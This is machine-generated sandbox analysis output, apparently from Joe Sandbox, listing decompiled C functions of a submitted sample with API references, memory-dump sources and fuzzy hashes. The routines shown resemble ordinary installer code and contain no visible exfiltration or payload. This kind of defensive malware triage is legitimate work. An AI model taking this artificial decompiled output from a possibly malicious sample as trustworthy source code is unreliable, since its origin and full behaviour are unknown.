                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PrivateProfileString
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1096422788-0
                                                                                                                                                                            • Opcode ID: e1bf17ceeca7babf037772fd815ac17da169c1b5a8a1c598223fa677f22f5cbc
                                                                                                                                                                            • Instruction ID: 39f1f9859769fa242ff58571ca275c021542d1dfaf63d46caa25723865460d27
                                                                                                                                                                            • Opcode Fuzzy Hash: e1bf17ceeca7babf037772fd815ac17da169c1b5a8a1c598223fa677f22f5cbc
                                                                                                                                                                            • Instruction Fuzzy Hash: 66E08630A04214BFDB20EFA08D09BAE3669BF11714F10403AF9917B0D2EAB849419B1D
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00401595() {
                                                                                                                                                                            				int _t5;
                                                                                                                                                                            				void* _t11;
                                                                                                                                                                            				int _t14;
                                                                                                                                                                            
                                                                                                                                                                            				_t5 = SetFileAttributesA(E00402A3A(0xfffffff0),  *(_t11 - 0x24)); // executed
                                                                                                                                                                            				_t14 = _t5;
                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                            					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t11 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}






                                                                                                                                                                            0x004015a0
                                                                                                                                                                            0x004015a6
                                                                                                                                                                            0x004015a8
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: 4260423a6babc0d982a83c1f89c59980bcd1968f2ee2cb317ff03f39022b103f
                                                                                                                                                                            • Instruction ID: e7eaa26ee73965d29c722757b3dcf4c0106c30ff4276e434a6a3861fc4943bf0
                                                                                                                                                                            • Opcode Fuzzy Hash: 4260423a6babc0d982a83c1f89c59980bcd1968f2ee2cb317ff03f39022b103f
                                                                                                                                                                            • Instruction Fuzzy Hash: 65D01273B14100ABDB10EBA49A08A9D73A5AB60329B308637D201F21D1D6B9CA55AA29
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00403F13(int _a4) {
                                                                                                                                                                            				long _t2;
                                                                                                                                                                            
                                                                                                                                                                            				_t2 = SendMessageA( *0x423708, 0x28, _a4, 1); // executed
                                                                                                                                                                            				return _t2;
                                                                                                                                                                            			}




                                                                                                                                                                            0x00403f21
                                                                                                                                                                            0x00403f27

                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageA.USER32(00000028,?,00000001,00403D44), ref: 00403F21
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                                                                                                                            • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                                                                                                                                                            • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                                                                                                                            • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00403091(long _a4) {
                                                                                                                                                                            				long _t2;
                                                                                                                                                                            
                                                                                                                                                                            				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
                                                                                                                                                                            				return _t2;
                                                                                                                                                                            			}




                                                                                                                                                                            0x0040309f
                                                                                                                                                                            0x004030a5

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 0040309F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                                                                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E004014D6() {
                                                                                                                                                                            				long _t2;
                                                                                                                                                                            				void* _t6;
                                                                                                                                                                            				void* _t10;
                                                                                                                                                                            
                                                                                                                                                                            				_t2 = E00402A1D(_t6);
                                                                                                                                                                            				if(_t2 <= 1) {
                                                                                                                                                                            					_t2 = 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				Sleep(_t2); // executed
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t10 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}






                                                                                                                                                                            0x004014d7
                                                                                                                                                                            0x004014df
                                                                                                                                                                            0x004014e3
                                                                                                                                                                            0x004014e3
                                                                                                                                                                            0x004014e5
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                            • Opcode ID: fc596c614bf1f88db1f948d4491d55e59510561650873cba60640436c697c481
                                                                                                                                                                            • Instruction ID: 9c89d06b59eba3ca4e7b2e7dbe410ddf5a45079d0a4e8d0192c1fc54d184d5ff
                                                                                                                                                                            • Opcode Fuzzy Hash: fc596c614bf1f88db1f948d4491d55e59510561650873cba60640436c697c481
                                                                                                                                                                            • Instruction Fuzzy Hash: A2D0C777B1454057D710E7B87E8545A63A9F7513253204937D502F1091D578C9059A29
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10001215() {
                                                                                                                                                                            				void* _t1;
                                                                                                                                                                            
                                                                                                                                                                            				_t1 = GlobalAlloc(0x40,  *0x1000405c); // executed
                                                                                                                                                                            				return _t1;
                                                                                                                                                                            			}




                                                                                                                                                                            0x1000121d
                                                                                                                                                                            0x10001223

                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1202605160.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1202572962.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202644162.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202672082.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                            • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                                                                                            • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                                                                                                                                            • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                                                                                            • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E00405050(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                                                                            				struct HWND__* _v8;
                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                            				void* _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				int _v40;
                                                                                                                                                                            				int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				int _v52;
                                                                                                                                                                            				void* _v56;
                                                                                                                                                                            				void* _v64;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				struct HWND__* _t87;
                                                                                                                                                                            				struct HWND__* _t89;
                                                                                                                                                                            				long _t90;
                                                                                                                                                                            				int _t95;
                                                                                                                                                                            				int _t96;
                                                                                                                                                                            				long _t99;
                                                                                                                                                                            				void* _t102;
                                                                                                                                                                            				intOrPtr _t124;
                                                                                                                                                                            				struct HWND__* _t128;
                                                                                                                                                                            				int _t150;
                                                                                                                                                                            				int _t153;
                                                                                                                                                                            				long _t157;
                                                                                                                                                                            				struct HWND__* _t161;
                                                                                                                                                                            				struct HMENU__* _t163;
                                                                                                                                                                            				long _t165;
                                                                                                                                                                            				void* _t166;
                                                                                                                                                                            				char* _t167;
                                                                                                                                                                            				char* _t168;
                                                                                                                                                                            				int _t169;
                                                                                                                                                                            
                                                                                                                                                                            				_t87 =  *0x422ee4; // 0x0
                                                                                                                                                                            				_t157 = _a8;
                                                                                                                                                                            				_t150 = 0;
                                                                                                                                                                            				_v8 = _t87;
                                                                                                                                                                            				if(_t157 != 0x110) {
                                                                                                                                                                            					__eflags = _t157 - 0x405;
                                                                                                                                                                            					if(_t157 == 0x405) {
                                                                                                                                                                            						CloseHandle(CreateThread(0, 0, E00404FE4, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t157 - 0x111;
                                                                                                                                                                            					if(_t157 != 0x111) {
                                                                                                                                                                            						L17:
                                                                                                                                                                            						__eflags = _t157 - 0x404;
                                                                                                                                                                            						if(_t157 != 0x404) {
                                                                                                                                                                            							L25:
                                                                                                                                                                            							__eflags = _t157 - 0x7b;
                                                                                                                                                                            							if(_t157 != 0x7b) {
                                                                                                                                                                            								goto L20;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t89 = _v8;
                                                                                                                                                                            							__eflags = _a12 - _t89;
                                                                                                                                                                            							if(_a12 != _t89) {
                                                                                                                                                                            								goto L20;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                                                                                                                                            							__eflags = _t90 - _t150;
                                                                                                                                                                            							_a12 = _t90;
                                                                                                                                                                            							if(_t90 <= _t150) {
                                                                                                                                                                            								L36:
                                                                                                                                                                            								return 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t163 = CreatePopupMenu();
                                                                                                                                                                            							AppendMenuA(_t163, _t150, 1, E00405D1B(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                                                                                                                                            							_t95 = _a16;
                                                                                                                                                                            							__eflags = _a16 - 0xffffffff;
                                                                                                                                                                            							_t153 = _a16 >> 0x10;
                                                                                                                                                                            							if(_a16 == 0xffffffff) {
                                                                                                                                                                            								GetWindowRect(_v8,  &_v24);
                                                                                                                                                                            								_t95 = _v24.left;
                                                                                                                                                                            								_t153 = _v24.top;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                                                                                                                                            							__eflags = _t96 - 1;
                                                                                                                                                                            							if(_t96 == 1) {
                                                                                                                                                                            								_t165 = 1;
                                                                                                                                                                            								__eflags = 1;
                                                                                                                                                                            								_v56 = _t150;
                                                                                                                                                                            								_v44 = 0x41fd08;
                                                                                                                                                                            								_v40 = 0x1000;
                                                                                                                                                                            								_a4 = _a12;
                                                                                                                                                                            								do {
                                                                                                                                                                            									_a4 = _a4 - 1;
                                                                                                                                                                            									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                                                                                                                                            									__eflags = _a4 - _t150;
                                                                                                                                                                            									_t165 = _t165 + _t99 + 2;
                                                                                                                                                                            								} while (_a4 != _t150);
                                                                                                                                                                            								OpenClipboard(_t150);
                                                                                                                                                                            								EmptyClipboard();
                                                                                                                                                                            								_t102 = GlobalAlloc(0x42, _t165);
                                                                                                                                                                            								_a4 = _t102;
                                                                                                                                                                            								_t166 = GlobalLock(_t102);
                                                                                                                                                                            								do {
                                                                                                                                                                            									_v44 = _t166;
                                                                                                                                                                            									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                                                                                                                                            									 *_t167 = 0xd;
                                                                                                                                                                            									_t168 = _t167 + 1;
                                                                                                                                                                            									 *_t168 = 0xa;
                                                                                                                                                                            									_t166 = _t168 + 1;
                                                                                                                                                                            									_t150 = _t150 + 1;
                                                                                                                                                                            									__eflags = _t150 - _a12;
                                                                                                                                                                            								} while (_t150 < _a12);
                                                                                                                                                                            								GlobalUnlock(_a4);
                                                                                                                                                                            								SetClipboardData(1, _a4);
                                                                                                                                                                            								CloseClipboard();
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L36;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *0x422ecc - _t150; // 0x0
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							ShowWindow( *0x423708, 8);
                                                                                                                                                                            							__eflags =  *0x42378c - _t150;
                                                                                                                                                                            							if( *0x42378c == _t150) {
                                                                                                                                                                            								E00404F12( *((intOrPtr*)( *0x41f4e0 + 0x34)), _t150);
                                                                                                                                                                            							}
                                                                                                                                                                            							E00403EB7(1);
                                                                                                                                                                            							goto L25;
                                                                                                                                                                            						}
                                                                                                                                                                            						 *0x41f0d8 = 2;
                                                                                                                                                                            						E00403EB7(0x78);
                                                                                                                                                                            						goto L20;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eflags = _a12 - 0x403;
                                                                                                                                                                            						if(_a12 != 0x403) {
                                                                                                                                                                            							L20:
                                                                                                                                                                            							return E00403F45(_t157, _a12, _a16);
                                                                                                                                                                            						}
                                                                                                                                                                            						ShowWindow( *0x422ed0, _t150);
                                                                                                                                                                            						ShowWindow(_v8, 8);
                                                                                                                                                                            						E00403F13(_v8);
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				_v48 = _v48 | 0xffffffff;
                                                                                                                                                                            				_v36 = _v36 | 0xffffffff;
                                                                                                                                                                            				_t169 = 2;
                                                                                                                                                                            				_v56 = _t169;
                                                                                                                                                                            				_v52 = 0;
                                                                                                                                                                            				_v44 = 0;
                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                            				_t124 =  *0x423710;
                                                                                                                                                                            				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                                                                                                                                            				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                                                                                                                                            				 *0x422ed0 = GetDlgItem(_a4, 0x403);
                                                                                                                                                                            				 *0x422ec8 = GetDlgItem(_a4, 0x3ee);
                                                                                                                                                                            				_t128 = GetDlgItem(_a4, 0x3f8);
                                                                                                                                                                            				 *0x422ee4 = _t128;
                                                                                                                                                                            				_v8 = _t128;
                                                                                                                                                                            				E00403F13( *0x422ed0);
                                                                                                                                                                            				 *0x422ed4 = E004047B0(4);
                                                                                                                                                                            				 *0x422eec = 0;
                                                                                                                                                                            				GetClientRect(_v8,  &_v24);
                                                                                                                                                                            				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                                                                                                                                            				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                                                                                                                            				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                                                                                                            				if(_a12 >= 0) {
                                                                                                                                                                            					SendMessageA(_v8, 0x1001, 0, _a12);
                                                                                                                                                                            					SendMessageA(_v8, 0x1026, 0, _a12);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_a8 >= _t150) {
                                                                                                                                                                            					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                                                                                                                                            				}
                                                                                                                                                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                                            				_push(0x1b);
                                                                                                                                                                            				E00403EDE(_a4);
                                                                                                                                                                            				if(( *0x423718 & 0x00000003) != 0) {
                                                                                                                                                                            					ShowWindow( *0x422ed0, _t150);
                                                                                                                                                                            					if(( *0x423718 & 0x00000002) != 0) {
                                                                                                                                                                            						 *0x422ed0 = _t150;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						ShowWindow(_v8, 8);
                                                                                                                                                                            					}
                                                                                                                                                                            					E00403F13( *0x422ec8);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t161 = GetDlgItem(_a4, 0x3ec);
                                                                                                                                                                            				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                                                                                                                                            				if(( *0x423718 & 0x00000004) != 0) {
                                                                                                                                                                            					SendMessageA(_t161, 0x409, _t150, _a8);
                                                                                                                                                                            					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L36;
                                                                                                                                                                            			}



































                                                                                                                                                                            0x00405056
                                                                                                                                                                            0x0040505e
                                                                                                                                                                            0x00405061
                                                                                                                                                                            0x00405069
                                                                                                                                                                            0x0040506c
                                                                                                                                                                            0x004051fb
                                                                                                                                                                            0x00405201
                                                                                                                                                                            0x00405225
                                                                                                                                                                            0x00405225
                                                                                                                                                                            0x00405231
                                                                                                                                                                            0x00405237
                                                                                                                                                                            0x00405259
                                                                                                                                                                            0x00405259
                                                                                                                                                                            0x0040525f
                                                                                                                                                                            0x004052b4
                                                                                                                                                                            0x004052b4
                                                                                                                                                                            0x004052b7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004052b9
                                                                                                                                                                            0x004052bc
                                                                                                                                                                            0x004052bf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004052c9
                                                                                                                                                                            0x004052cf
                                                                                                                                                                            0x004052d1
                                                                                                                                                                            0x004052d4
                                                                                                                                                                            0x004053d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004053d1
                                                                                                                                                                            0x004052e3
                                                                                                                                                                            0x004052ef
                                                                                                                                                                            0x004052f8
                                                                                                                                                                            0x004052ff
                                                                                                                                                                            0x00405303
                                                                                                                                                                            0x00405306
                                                                                                                                                                            0x0040530f
                                                                                                                                                                            0x00405315
                                                                                                                                                                            0x00405318
                                                                                                                                                                            0x00405318
                                                                                                                                                                            0x00405328
                                                                                                                                                                            0x0040532e
                                                                                                                                                                            0x00405331
                                                                                                                                                                            0x0040533c
                                                                                                                                                                            0x0040533c
                                                                                                                                                                            0x0040533d
                                                                                                                                                                            0x00405340
                                                                                                                                                                            0x00405347
                                                                                                                                                                            0x0040534e
                                                                                                                                                                            0x00405356
                                                                                                                                                                            0x00405356
                                                                                                                                                                            0x00405364
                                                                                                                                                                            0x0040536a
                                                                                                                                                                            0x0040536d
                                                                                                                                                                            0x0040536d
                                                                                                                                                                            0x00405374
                                                                                                                                                                            0x0040537a
                                                                                                                                                                            0x00405383
                                                                                                                                                                            0x0040538a
                                                                                                                                                                            0x00405393
                                                                                                                                                                            0x00405395
                                                                                                                                                                            0x00405398
                                                                                                                                                                            0x004053a7
                                                                                                                                                                            0x004053a9
                                                                                                                                                                            0x004053ac
                                                                                                                                                                            0x004053ad
                                                                                                                                                                            0x004053b0
                                                                                                                                                                            0x004053b1
                                                                                                                                                                            0x004053b2
                                                                                                                                                                            0x004053b2
                                                                                                                                                                            0x004053ba
                                                                                                                                                                            0x004053c5
                                                                                                                                                                            0x004053cb
                                                                                                                                                                            0x004053cb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405331
                                                                                                                                                                            0x00405261
                                                                                                                                                                            0x00405267
                                                                                                                                                                            0x00405295
                                                                                                                                                                            0x00405297
                                                                                                                                                                            0x0040529d
                                                                                                                                                                            0x004052a8
                                                                                                                                                                            0x004052a8
                                                                                                                                                                            0x004052af
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004052af
                                                                                                                                                                            0x0040526b
                                                                                                                                                                            0x00405275
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405239
                                                                                                                                                                            0x00405239
                                                                                                                                                                            0x0040523f
                                                                                                                                                                            0x0040527a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405281
                                                                                                                                                                            0x00405248
                                                                                                                                                                            0x0040524f
                                                                                                                                                                            0x00405254
